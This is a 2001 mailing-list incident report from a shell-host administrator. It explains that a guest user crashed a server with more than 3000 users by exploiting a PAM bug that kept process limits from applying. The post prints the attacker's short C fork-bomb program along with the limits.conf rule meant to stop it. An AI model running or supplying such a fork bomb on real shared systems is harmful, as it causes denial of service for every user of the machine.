[Polarhome] cracked
Zoltan Arpadffy
arpadffy@polarhome.com
Mon, 3 Sep 2001 22:57:49 +0200
gate.polarhome.com has been cracked.
attack was not constructive and it was directly against gate's
functionality.
Attacker used PAM modules bug that it is not possible to configure
/etc/security/limits.conf file with user environment limitations. This bug
has been submitted to bugzilla several times (once by me), but RedHat didn't
take it with high importance.
Scenario:
guest user logged in.
guest pts/108 Mon Sep 3 10:44 - 12:56 (02:11)
cmb5-152.dial-up.arnes.si
writes a c program:
#include <stdio.h>
main(){
system("/usr/bin/uptime");
while(1){
fork();
}
}
This program just overload the system...
Normally /etc/security/limits.conf would easily stop the this kind of
attacks with
* hard nproc 100
... but not the buggy PAM :-)
Anyhow system with more than 3000 users was down.
root
>